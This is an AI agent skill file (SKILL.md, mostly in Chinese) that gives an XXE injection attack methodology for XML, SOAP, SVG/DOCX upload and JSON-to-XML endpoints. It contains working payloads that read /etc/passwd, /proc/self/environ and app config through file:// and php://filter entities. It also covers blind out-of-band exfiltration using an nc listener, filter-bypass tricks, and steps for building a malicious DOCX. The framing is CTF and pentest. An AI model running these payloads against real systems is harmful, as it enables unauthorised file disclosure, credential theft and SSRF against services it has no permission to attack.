xxe-injection-methodology

Name: xxe-injection-methodology
Author: wgpsec/AboutSecurity

$npx mdskill add wgpsec/AboutSecurity/xxe-injection-methodology

Exploit XML parsers to read files via XXE injection.

Detects and exploits XXE vulnerabilities in SOAP, file upload, and JSON endpoints.
Executes payloads using external DTDs, parameter entities, and blind out-of-band techniques.
Selects attack vectors based on response presence, SOAP envelope structure, or Content-Type headers.
Delivers file contents or out-of-band data through XML entity references or HTTP servers.

SKILL.md

.github/skills/xxe-injection-methodologyView on GitHub ↗

---
name: xxe-injection-methodology
description: "XML外部实体注入(XXE)的检测与利用方法论。当目标有 XML 解析、SOAP API、文件上传（DOCX/XLSX/SVG）、或任何接受 XML 输入的端点时使用。包含基础文件读取、盲 XXE 外带（参数实体+外部DTD）、SVG/DOCX XXE、SOAP Envelope XXE、JSON→XML 转换攻击。即使 API 文档说只接受 JSON，也应尝试 XML Content-Type 测试隐式 XXE。"
metadata:
  tags: "xxe,xml,xml external entity,blind-xxe,dtd,soap,svg,docx,file-read,oob,parameter-entity,application/xml,text/xml,DOCTYPE,ENTITY,外部实体,xml解析,Content-Type: xml"
  category: "exploit"
---

# XXE 注入攻击方法论

## 深入参考

- XXE 文件读取、盲 XXE 外带、SVG/DOCX XXE、SOAP XXE 完整 payload → [references/xxe-exploitation.md](references/xxe-exploitation.md)
- XXE 高级技术（盲注/OOB/文件上传/XInclude/编码绕过） → [references/xxe-advanced.md](references/xxe-advanced.md)

---

## Phase 1: 发现 XXE 入口

- Content-Type: `application/xml` 或 `text/xml` 的端点
- **将 JSON 请求改为 XML**：即使端点接受 JSON，也尝试发 XML（很多后端同时支持两种格式）
- 文件上传（DOCX, XLSX, SVG 都是 XML 格式）
- SOAP API（URL 含 `/ws/`、`/soap/`、`/wsdl/`）

## Phase 2: 基础 XXE 文件读取

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>
```

**关键**：`&xxe;` 必须放在会被回显的 XML 元素里！

### 常见目标文件

```
file:///flag.txt
file:///flag
file:///app/flag.txt
file:///etc/passwd
file:///app/app.py
file:///proc/self/environ
```

## Phase 3: 利用决策树

```
XXE 入口确认
├─ SOAP 端点？ → XXE 必须嵌入 SOAP Envelope！→ [references/xxe-exploitation.md](references/xxe-exploitation.md)
├─ 有回显？ → 直接 ENTITY file:/// 读文件
├─ 无回显？ → 盲 XXE 参数实体 + 外部 DTD 外带
│  └─ 用 bash 运行 `python3 -m http.server` 或 `nc -lvp PORT` 接收 OOB 回调
│  └─ [references/xxe-exploitation.md](references/xxe-exploitation.md)
├─ PHP 目标？ → php://filter/convert.base64-encode 绕过 XML 特殊字符
└─ 文件上传入口？ → SVG/DOCX XXE → [references/xxe-exploitation.md](references/xxe-exploitation.md)
```

## Phase 4: PHP 特殊技巧

PHP 文件含 `<` 等特殊字符会破坏 XML 解析，使用 php://filter base64 编码绕过：
```xml
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/app/config.php">
```

## Phase 5: JSON → XML 转换攻击

有些后端同时支持 JSON 和 XML，解析器自动选择格式：

```
Content-Type: application/xml
```
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///flag.txt">]>
<root><username>&xxe;</username><password>test</password></root>
```

即使文档说 JSON，也尝试 XML Content-Type，可能存在隐式支持。

## XXE 防御绕过

- `<!DOCTYPE>` 被过滤 → 尝试 UTF-16 编码
- `ENTITY` 被过滤 → 尝试参数实体 `%xxe;`
- `SYSTEM` 被过滤 → 尝试 `PUBLIC "x" "file:///flag"`

## 注意事项

- **XXE 本质上包含 SSRF**：`SYSTEM "http://..."` 就是服务端请求
- **XML 解析器差异**：Python lxml 默认禁用外部实体；Java 老版本默认启用
- **盲 XXE 需要外部服务器**：参数实体外带需要你控制一台服务器接收数据

---

## CTF XXE 技巧补充

### DOCX/Office XML 上传 XXE
DOCX 是 ZIP 包含 XML，修改 `[Content_Types].xml` 注入 XXE：
```bash
unzip template.docx
# 编辑 [Content_Types].xml 添加 DOCTYPE + ENTITY
zip -r exploit.docx . 
# 上传后服务端解析 XML 时触发 XXE
```

### XML 注入点扩展
除了常规请求体，检查这些注入点：
- `X-Forwarded-For` 等 Header 被写入 XML 日志时
- SVG 文件上传（SVG 是 XML）
- SOAP/SAML 端点
- RSS/Atom feed 输入